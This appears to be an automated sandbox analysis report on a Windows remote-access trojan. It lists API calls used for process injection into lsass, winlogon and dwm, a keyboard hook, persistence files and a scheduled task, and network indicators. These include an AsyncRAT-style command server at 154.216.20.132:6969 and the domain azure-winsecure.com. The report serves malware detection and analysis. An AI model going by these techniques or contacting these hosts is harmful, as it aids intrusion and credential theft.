Source: Binary string: System.Numerics.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEED894 FindFirstFileExW,20_2_000002527DEED894
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1D894 FindFirstFileExW,20_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1D894 FindFirstFileExW,21_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00000286D7D1DA18
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783D894 FindFirstFileExW,40_2_000001D54783D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922D894 FindFirstFileExW,41_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942D894 FindFirstFileExW,41_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1ED894 FindFirstFileExW,42_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21D894 FindFirstFileExW,42_2_000001CA7D21D894
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5D894 FindFirstFileExW,43_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92D894 FindFirstFileExW,44_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95D894 FindFirstFileExW,44_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_00000262F1CDDA18
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1CDD894 FindFirstFileExW,45_2_00000262F1CDD894
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D0D894 FindFirstFileExW,45_2_00000262F1D0D894
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,46_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023942B1D894 FindFirstFileExW,46_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DD894 FindFirstFileExW,47_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,47_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570D894 FindFirstFileExW,47_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,47_2_000001EF0570DA18

Networking

barindex
Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 154.216.20.132:6969 -> 192.168.2.7:49719
Source: global trafficTCP traffic: 192.168.2.7:49719 -> 154.216.20.132:6969
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewIP Address: 195.201.57.90 195.201.57.90
Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownDNS query: name: ipwho.is
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0Host: ipwho.isConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: global trafficDNS traffic detected: DNS query: ipwho.is
Source: Microsoft-Windows-LiveId%4Operational.evtx.53.drString found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002B.00000002.2594057411.0000017D2D493000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079470975.0000017D2D493000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000002B.00000000.2079135025.0000017D2D400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2586980188.0000017D2D400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
Source: powershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micom/fwlink/?LinkI
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002B.00000000.2079616392.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2597070274.0000017D2D59A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079323162.0000017D2D460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2590892961.0000017D2D460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: dwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://osoft.co_2010-06X
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/P
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000002B.00000000.2079386298.0000017D2D471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2592379477.0000017D2D471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGh
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5760, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB7A0C5D NtWriteVirtualMemory,39_2_00007FFAAB7A0C5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB7A0FE4 NtResumeThread,39_2_00007FFAAB7A0FE4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB79DF98 NtUnmapViewOfSection,39_2_00007FFAAB79DF98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB7A0F20 NtSetContextThread,39_2_00007FFAAB7A0F20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB79E078 NtUnmapViewOfSection,39_2_00007FFAAB79E078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB7A0A3E NtUnmapViewOfSection,39_2_00007FFAAB7A0A3E
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,41_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1E2C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,42_2_000001CA7D1E2C80
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD52300 NtQuerySystemInformation,StrCmpNIW,43_2_0000017D2DD52300
Source: C:\Windows\System32\dwm.exeCode function: 45_2_00000262F1D02C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,45_2_00000262F1D02C80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_pvursesw.30i.ps1
Source: C:\Windows\System32\cmd.exeCode function: 20_3_000002527DEBCC9420_3_000002527DEBCC94
Source: C:\Windows\System32\cmd.exeCode function: 20_3_000002527DEB23F020_3_000002527DEB23F0
Source: C:\Windows\System32\cmd.exeCode function: 20_3_000002527DEBCE1820_3_000002527DEBCE18
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEED89420_2_000002527DEED894
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE2FF020_2_000002527DEE2FF0
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEEDA1820_2_000002527DEEDA18
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1D89420_2_000002527DF1D894
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF12FF020_2_000002527DF12FF0
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DF1DA1820_2_000002527DF1DA18
Source: C:\Windows\System32\conhost.exeCode function: 21_3_00000286D7CECC9421_3_00000286D7CECC94
Source: C:\Windows\System32\conhost.exeCode function: 21_3_00000286D7CE23F021_3_00000286D7CE23F0
Source: C:\Windows\System32\conhost.exeCode function: 21_3_00000286D7CECE1821_3_00000286D7CECE18
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1D89421_2_00000286D7D1D894
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D12FF021_2_00000286D7D12FF0
Source: C:\Windows\System32\conhost.exeCode function: 21_2_00000286D7D1DA1821_2_00000286D7D1DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB79F65939_2_00007FFAAB79F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB79DD5839_2_00007FFAAB79DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB79E32939_2_00007FFAAB79E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB79FDE939_2_00007FFAAB79FDE9
Source: C:\Windows\System32\conhost.exeCode function: 40_3_000001D54780CE1840_3_000001D54780CE18
Source: C:\Windows\System32\conhost.exeCode function: 40_3_000001D54780CC9440_3_000001D54780CC94
Source: C:\Windows\System32\conhost.exeCode function: 40_3_000001D5478023F040_3_000001D5478023F0
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783DA1840_2_000001D54783DA18
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D54783D89440_2_000001D54783D894
Source: C:\Windows\System32\conhost.exeCode function: 40_2_000001D547832FF040_2_000001D547832FF0
Source: C:\Windows\System32\dllhost.exeCode function: 41_3_000001EF091FCC9441_3_000001EF091FCC94
Source: C:\Windows\System32\dllhost.exeCode function: 41_3_000001EF091F23F041_3_000001EF091F23F0
Source: C:\Windows\System32\dllhost.exeCode function: 41_3_000001EF091FCE1841_3_000001EF091FCE18
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140001CF041_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_0000000140002D4C41_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000000014000320441_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000000014000243441_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000000014000127441_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922D89441_2_000001EF0922D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF09222FF041_2_000001EF09222FF0
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0922DA1841_2_000001EF0922DA18
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942D89441_2_000001EF0942D894
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF09422FF041_2_000001EF09422FF0
Source: C:\Windows\System32\dllhost.exeCode function: 41_2_000001EF0942DA1841_2_000001EF0942DA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_3_000001CA7D1BCE1842_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exeCode function: 42_3_000001CA7D1BCC9442_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exeCode function: 42_3_000001CA7D1B23F042_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1EDA1842_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1ED89442_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D1E2FF042_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21DA1842_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D21D89442_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001CA7D212FF042_2_000001CA7D212FF0
Source: C:\Windows\System32\lsass.exeCode function: 43_3_0000017D2DD2CE1843_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exeCode function: 43_3_0000017D2DD2CC9443_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exeCode function: 43_3_0000017D2DD223F043_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5DA1843_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD5D89443_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exeCode function: 43_2_0000017D2DD52FF043_2_0000017D2DD52FF0
Source: C:\Windows\System32\svchost.exeCode function: 44_3_0000022F4B9223F044_3_0000022F4B9223F0
Source: C:\Windows\System32\svchost.exeCode function: 44_3_0000022F4B92CE1844_3_0000022F4B92CE18
Source: C:\Windows\System32\svchost.exeCode function: 44_3_0000022F4B92CC9444_3_0000022F4B92CC94
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B922FF044_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92DA1844_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B92D89444_2_0000022F4B92D894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B952FF044_2_0000022F4B952FF0
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95DA1844_2_0000022F4B95DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_0000022F4B95D89444_2_0000022F4B95D894
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CD23F045_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CDCE1845_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CDCC9445_3_00000262F1CDCC94
